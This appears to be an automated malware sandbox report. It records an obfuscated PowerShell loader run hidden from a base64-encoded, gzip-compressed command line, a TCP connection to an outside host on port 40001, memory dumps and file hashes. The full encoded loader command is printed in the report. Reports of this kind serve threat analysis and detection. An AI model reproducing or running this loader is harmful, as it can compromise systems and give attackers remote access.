DAAbQA4AFcAbABNAHoARQAyAE0ASQArAG8AVwBoAEYAVgBmAEMAZwByAHgARwBjAGsAeABxAFIAVgBpACcAJwArACcAJwBBAC8AQgBSAEwAZQA4ADIAaQBHAGMAUwBSAGcASQBzAEoATQB5AFMARwB6ACsAcABuAFUAWgBVAFAATwBrAGEARwBXAFUAZQBTAFoAQQBMAGcAVQAzAEIASwA0AGgANQA1AFUAZABuAHQAcABGAFQAeQA3ADIANABUAHkASQBBAGMAUABzAE4AWgBDADMANQBrAEMAYQBrAGsATgA2AGwAeABxAHsAMQB9ADQAWABYADYARABVAEwAbgBOAGMASgBwAFcARgBUAHUARABQAEgAVwByACcAJwArACcAJwBpAGsATQAnACcAKwAnACcAdwBJADEANQBWAFEAWABGAEsAZAAxAHMAJwAnACsAJwAnAG8ARQB6AHkAZgBsAHAALwBkADcAVwBkAE0AVQBCAGUAbgBvAGoAQwAzAHEAUAB3AGIAegAnACcAKwAnACcAOQAyADUAYgBSADYAbgBJAHMAbABjACcAJwArACcAJwBpAEMAMQBnAGMATwBXAHMAaQBFAHMAeABrADUAQgBVAGwAUwA3ADEAaQBMAEYAeABhAEYAQwBjAFgAMwA0AFIAawBEAFoAbQBEAFAASQBIAEwATgAxAEQAUQBHAEIARgBBAHUARQBJAHkAWgBnAEUAWABNADMAWgBVAGEAawA1AFIAUABTAGkARgBTAE0AUgB5AE8AUwBGAHcAMgBJADQAZwBEAEsAeAB5ADUASwBjAHsAMQB9AGoAZwBnAFgAdgBrADEAVAA0AHQAcwAyAEYASgBmAHsAMQB9AGwATwBBAHMAdQBjAG4AQgBOAHgAaABYAEYAUwBWAEMAVQAwAEUAMQBDAEcASgBjADAANgB5AC8AKwBYAEgAegB5AFYAbwA2ADEAQQA3AEkAYgBzAFEAcQBVAFcAbQB6AHsAMQB9ADIATgBrAE0AbABRAGUAaAB5AFoAQQA4AG4AVgBIAFUANAA1AEsAbwBrAEEAUgBLAHkARQBSAHcAWgBPAHkAVwBGAHIAVwAyAC8AVQBEADkAbwBsAHQAUgBHAE0AVwBTADkAbQBmAGUAOQBzAFMAZQB1ADkATgBmAHoANgA4AEIAdgBUAFoAbwAvADMALwBTAE4AYgA2AEQAegBxAHUAKwAzAFUANwBsAGgASABpAEsANgBEAHQAWABzADAAUQBLADUAMwA1AHAARgBqAFoAOQBJAFMAegBtAGwAUAB0AEcAMwBVAEgAVgBMAGQAYQBJAFcAdQBvAFYAJwAnACsAJwAnAC8ASgBlAFQAMABJAGsASABkADUANABSAGoAaABNACcAJwArACcAJwBIAFMAWgBiAHAAdABkAHoAWgBtAGwATwBsADEAMwBwADkATABXADEAbwBiAGIAYQBuAFcAdgBkAGQAUgBzAHQAaQA2AGIAKwBoAEkAUQBuACcAJwArACcAJwBJAEgAZQBFAG4AbQBEAGkASwA0AGYATABtAEQAdQBTAGgAdABHAEwAegBYADAASABqAHMAOQAnACcAKwAnACcAYQA0ADkAdQBwAHcAMwByAFoAcwBxADYAVwBzAHMASwAvAFMAbABQAG4AYwBPAFoAcQBXAG4AYQBzAHsAMQB9AGYATgAvAGcAewAxAH0AaABnADMAdgBOAC8AdQBhADYAUAB1AEoAWABYAFQAYwB5AFcAagBIAFgAagAnACcAKwAnACcAdAB1AHQASgBUAHAARgBxAEIAMgBmAFQAaQB5AEQAbgA4ACsATQBCAE4AbgBhAEIAQQBjAHIAagBvAGEAZgBtAGoAdwBLADIAdQBqAHMAdwBhAEQAawBaAGoAaQAyAGoATwBIAFEATQB0AEMANAA4AC8AWABPAFAATgB7ADEAfQBDADcAWABoADYAagBVAE4AagBPAG0AbgBRAG0AOQBYADEASwBJAFIAdgBhADkAMABkAG4AbQB0ADYAcQArAGUAUgBSADAANABsAGMAQgAyAE8AYwBHAGoAeQBVAHoAbQAzAFAATQA5ADgANABKAFoANQBhADYANgBFAE4AYQAxAFAAQgBwADIAUAA2AGMAUABaACcAJwArACcAJwBOAGUANQBmAEoASgBlAFcAcAB0AFcAbgBJAEIAdQBNAHcARgA3AFEAYgByAGkAaABEAC8AYgBNAGoAOABqADQATwBPAEIAcABBAHkAOABOAGoAZwB4AHAANAArAHsAMQB9AE8AZABjAEwAWgB5AHIASQBaADcARgArAE4ARwB4AHgATgAyAE8AQQBhAG8ANAB1AGIAagBiAFEAeABzADEAdQBvAHEALwBOAHAASgAwAEIARAAnACcAKwAnACcARQBNAGUAQgBNAGMAUQBvAHYAVABjAGYAVABhADAAKwA4AGIAZwAzAC8AVwBNAHcAOAA3AFgASgBOAGYAdQBrAG0AZQAyAGgASAB7ADEAfQA0ADEATwBWAGIAawBIAHYANgB1AHUAKwBhADUAZQAxAE4AZgB1ADUAZQBmAGoAaQA2AG0AZABCAEoAeABCACcAJwArACcAJwBOAHUAVABEADAAQwBnACsAWgBqAEcAbwB0AGwAewAnACcAKwAnACcAMQB9AGwAQgA1ADgAVwBXADMAZgB2AHkAdAA1AGsAegAwAEsAdgBkAFoASAArAGoAaABKAFEAOAB5AEEAVwB0AEEAZwBpAGsAUwAzAGUARwBMAHQAaQByADcATgBxAGQAUgBRAFYAWABnADQATABFAGsAUwBFAHcAYgBOAEYAdABwAHgAawBSAHUASQBNAGUANwBLAGgAZwBQAE4AQQBWAHIAZAB0AGcASABKAGYAagBqAHUANQBlADYAOABOAEsAcwBvAFQAJwAnACsAJwAnADQASwBWADUAegBaAFUATABKADIAYwAzAEkAQwBIAE0AdABVAGcAQwBXAG8AWABKAEEANQBFAFcATgBVAGYAbQByAG8ATwBMAFUAUgAvADAARgB0ADUAVAByADMAOQBYAG0AMgArADIAcQBpADUAcwBhAHAAcwBRAGcAQgBMAHsAMQB9AFoAdgBsAHQAcwBFAGMAOQBSAFYAVgAvAGQAMQBJAHcAUwB0AEQAUQBMAEYANwBEAGEAdgBYAHsAMQB9AEkATgB6AGwAMQBDAHsAMQB9AG8ARgBSAHUAUwA0AFUARQB6ACsAQwBjADcAVQBPAFgAMwArAG0ASgBBAFAAdQA0AEEAVwBCADEAdQBQAFIAYwB2AGkANgBBAEcAYQBCADkAUQBPADYAVQBrAHAARABOAGQANwArAFoAbAAwAFQANABPADgAbQB5AHEAMwBVAGgALwBQAE4AKwBUAFoAYgBuAHQAVgAvAHMAdgBvAGwAQQBlAGwAWABDADgAdABQAGkAagB3AHQANwBmAGUASwAzAFgAWAA2AEsAcQBRAEEANQBCADgAbwAxAEkAOQB1AEgAeABFAHMAewAxAH0ANwBIAEoAagBMADYAbwA1ADcALwAzAGQAawBJAC8AcgB5ADAAdwBjAEQATwBDAHgAbAByAGUATABmAHcAQQBnADIANQBRADQAMAB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBZACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAEgH62UCA7VWbW/iOBD+vtL+h2iFRNBSEl6u21Za6RzSAG2hgRQoZdHJTZzEixPTxCmle/vfbxxIy9'+'62q95Ja4nWsWfG42eembGfxa6gPFbilvLt/TtlN2yc4EhRSzw1xlWllDUrz3ulNDs'+'8Uj4r6hytViaPMI0XJyftLElILLbftQ4RKE1JdMsoSdWK8rcyDUlCDi5vvxJXKN+U0l+1DuO3mO3ENm3shkQ5QLEn9y64i6VbNWfFqFDLX76UK/OD+qJ2epdhlqplZ5MKEtU8xsoV5XtFHni1WRG13KduwlPui9qUxs1GbRyn2CcDsHZP+kSE3EvLcJnn6yREZEm8vZU0sxVSyzC1E+4iz0tImparylweMF8s/lTnu9NHWSxoRGq9WJCErxyS3FOXpLUujj1GRsRfgJ{1}jE'+'hoHi0oFxO75kqilOGOsqvwXM+qArAvs3qqk7iuBlC2SShVC+sI9+9zLGNlqll9wNKdBBcaWCgDfd4mg/8Sdwxe487xQjHm+Q8Bf1e{1}pzVU'+'/K3pV6cPJWPBkA5+lqyQjlcUT2krp0R4l1bdaqxeqoEgm68{1}5rM0nnHqLZws/hL+0nPm9rpR6nc0m8WlMzE2MI+oWhFVfCgrxGckxqRVi'+'A/BRLe82iGcSRgIsJMySGz+pnUZUPOkaGWUeSZALgU3BK4h55UdntpFTy724TyIAcPsNZC35kCakkN6lxq{1}4XX6DULnNcJpWFTuDPHWr'+'ikM'+'wI15VQXFKd1s'+'oEzyflp/d7WdMUBenojC3qPwbz'+'925bR6nIslc'+'iC1gcOWsiEsxk5BUlS71iLFxaFCcX34RkDZmDPIHLN1DQGBFAuEIyZgEXM3ZUak5RPSiFSMRyOSFw2I4gDKxy5Kc{1}jggXvk1T4ts2FJf{1}lOAsucnBNxhXFSVCU0E1CGJc06y/+XHzyVo61A7IbsQqUWmz{1}2NkMlQehyZA8nVHU45KokARKyERwZOyWFrW2/UD9oltRGMWS9mfe9sSeu9Nfz68BvTZo/3/SNb6Dzqu+3U7lhHiK6DtXs0QK535pFjZ9ISzmlPtG3UHVLdaIWuoV'+'/JeT0IkHd54RjhM'+'HSZbptdzZmlOl13p9LW1obbanWvddRsti6b+hIQn'+'IHeEnmDiK4fLmDuShtGLzX0Hjs9'+'a49upw3rZsq6WssK/SlPncOZqWnas{1}fN/g{1}hg3vN/ua6PuJXXTcyWjHXj'+'tutJTpFqB2fTiyDn8+MBNnaBAcrjoafmjwK2ujswaDkZji2jOHQMtC48/XOPN{1}C7Xh6jUNjOmnQm9X1KIRva90dnmt6q+eRR04lcB2OcGjyUzm3PM984JZ5a66ENa1PBp2P6cPZ'+'Ne5fJJeWptWnIBuMwF7QbrihD/bMj8j4OOBpAy8Njgxp4+{1}OdcLZyrIZ7F+NGxxN2OAao4ubjbQxs1uoq/NpJ0BD'+'EMeBMcQovTcfTa0+8bg3/WMw87XJNfukme2hH{1}41OVbkHv6uu+a5e1Nfu5efji6mdBJxB'+'NuTD0Cg+ZjGotl{'+'1}lB58WW3fvyt5kz0KvdZH+jhJQ8yAWtAgikS3eGLtir7NqdRQVXg4LEkSEwbNFtpxkRuIMe7KhgPNAVrdtgHJfjju5e68NKsoT'+'4KV5zZULJ2c3ICHMtUgCWoXJA5EWNUfmroOLUR/0Ft5Tr39Xm2+2qi5sapsQgBL{1}ZvltsEc9RVV/d1IwStDQLF7DavX{1}INzl1C{1}oFRuS4UEz+Cc7UOX3+mJAPu4AWB1uPRcvi6AGaB9QO6UkpDNd7+Zl0T4O8myq3Uh/PN+TZbntV/svolAelXC8tPijwt7feK3XX6KqQA5B8o1I9uHxEs{1}7HJjL6o57/3dkI/ry0wcDOCxlreLfwAg25Q40wsAAA{0}{0}')-f'=','Y')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| CN | 1.14.247.162:40001 | tcp | |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/4340-0-0x00000000709DE000-0x00000000709DF000-memory.dmp
memory/4340-1-0x0000000002CB0000-0x0000000002CE6000-memory.dmp
memory/4340-2-0x00000000057C0000-0x0000000005DE8000-memory.dmp
memory/4340-3-0x00000000709D0000-0x0000000071180000-memory.dmp
memory/4340-4-0x00000000709D0000-0x0000000071180000-memory.dmp
memory/4340-5-0x0000000005720000-0x0000000005742000-memory.dmp
memory/4340-6-0x0000000005F20000-0x0000000005F86000-memory.dmp
memory/4340-7-0x0000000005F90000-0x0000000005FF6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i30gtbox.rza.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4340-17-0x0000000006000000-0x0000000006354000-memory.dmp
memory/4340-18-0x00000000065D0000-0x00000000065EE000-memory.dmp
memory/4340-19-0x0000000006620000-0x000000000666C000-memory.dmp
memory/4340-20-0x0000000007F20000-0x000000000859A000-memory.dmp
memory/4340-21-0x0000000006B10000-0x0000000006B2A000-memory.dmp
memory/4340-25-0x00000000709D0000-0x0000000071180000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/4364-35-0x00000000061A0000-0x00000000064F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0aeff08b35900f0766b875f429a0b880 |
| SHA1 | a181cd6e18cf1d2ee1ab40e99760f5b2dde58086 |
| SHA256 | 1b7ba808ba76c8882de1ebd1255811e3e7c7bd5a83c029b4487e9f9f7c5be507 |
| SHA512 | 6132d010fdd08d40e61aaf552fb6b81aa3a2efc4c9058ce632bbc799e473e0619dc5299e51144d9994ee87b207a34a0522ffa7c7125353c94996f3b6452d0c65 |
memory/4364-37-0x0000000006180000-0x0000000006181000-memory.dmp